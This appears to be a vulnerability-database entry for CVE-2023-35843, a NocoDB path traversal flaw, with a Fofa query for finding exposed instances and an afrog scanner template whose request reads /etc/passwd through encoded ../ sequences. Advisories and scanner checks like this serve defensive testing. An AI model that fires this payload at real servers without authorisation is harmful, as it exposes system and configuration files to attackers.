CVE-2023-35843: NocoDB Arbitrary File Read

日期: 2025-09-01 | 影响软件: NocoDB | POC: 已公开

漏洞描述

NocoDB through 0.106.0 (or 0.109.1) has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information Fofa: title=="NocoDB"

PoC代码[已公开]

id: CVE-2023-35843

info:
  name: NocoDB Arbitrary File Read
  author: laohuan12138
  severity: high
  verified: true
  description: |
    NocoDB through 0.106.0 (or 0.109.1) has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information
    Fofa: title=="NocoDB"
  
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-35843
    - https://advisory.dw1.io/60
  
  tags: cve,cve2023,lfi
  created: 2023/06/26

rules:
  r0:
    request:
      method: GET
      path: /download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)

expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2023/CVE-2023-35843.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2023-35843: NocoDB version <= 0.106.1 - Arbitrary File Read POC

NocoDB /download/ 文件读取漏洞 无POC

Nocodb服务端请求伪造漏洞 无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637） 无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358） 无POC

NocoDB /download/ 文件读取漏洞无POC

Nocodb服务端请求伪造漏洞无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637）无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358）无POC